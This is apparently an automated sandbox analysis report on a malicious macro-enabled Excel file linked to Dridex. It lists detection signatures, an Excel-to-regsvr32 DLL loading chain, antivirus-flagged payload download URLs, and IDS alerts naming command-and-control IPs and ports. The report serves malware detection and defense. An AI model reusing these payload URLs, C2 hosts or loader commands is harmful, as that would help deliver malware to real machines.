Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report printouts of outstanding as of 01_20_2021.xlsm

Overview

General Information

Sample Name:printouts of outstanding as of 01_20_2021.xlsm
Analysis ID:342170
MD5:28e9c78dcffb4a80c7bcfcd818791940
SHA1:0f239865c9e2bdd64d2017c7d26cac19dc7d3cde
SHA256:09cceb619174c99d026734f860f26cda0107af31b9153a9f7d6613c86fd57772

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2496 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2316 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1204 cmdline: -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2348 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zdkvrlsh.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 972 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zaviwlej.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1664 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\alajwj.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2684 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2940 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2852 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2848 cmdline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2428 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2424 cmdline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2400 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2372 cmdline: -s C:\Users\user\AppData\Local\Temp\ogsit.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2536 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\luwbghnz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2408 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2608 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1428 cmdline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2456 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 856 cmdline: -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 552, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, ProcessId: 2496
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 552, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, ProcessId: 2496
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 552, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll, ProcessId: 2496

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://cms.ivpr.org/by9zwa7p1.zipAvira URL Cloud: Label: malware
Source: http://monitrade.net/h79fwesfe.rarAvira URL Cloud: Label: malware
Source: http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zipAvira URL Cloud: Label: malware
Source: http://laureys.be/uzssv27.rarAvira URL Cloud: Label: malware
Source: http://artec.com.tr/xkpffwn.zipAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: printouts of outstanding as of 01_20_2021.xlsmVirustotal: Detection: 24%Perma Link
Source: printouts of outstanding as of 01_20_2021.xlsmReversingLabs: Detection: 11%

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connectionShow sources
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49191 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49192 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49199 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49204 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49209 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49212 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49216 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49225 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49232 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49238 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49241 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49244 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49246 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49249 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49256 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49257 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49260 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49271 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49279 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49283 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49293 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49286 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49305 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49309 version: TLS 1.0
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\ogsit.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: h79fwesfe[1].rar.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: monitrade.net
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.225.58.214:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.147.185:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49184
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49186
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49191
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49199
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49203
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49210
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49216
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49225
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49224
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49228
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49232
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49256
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49257
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49260
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
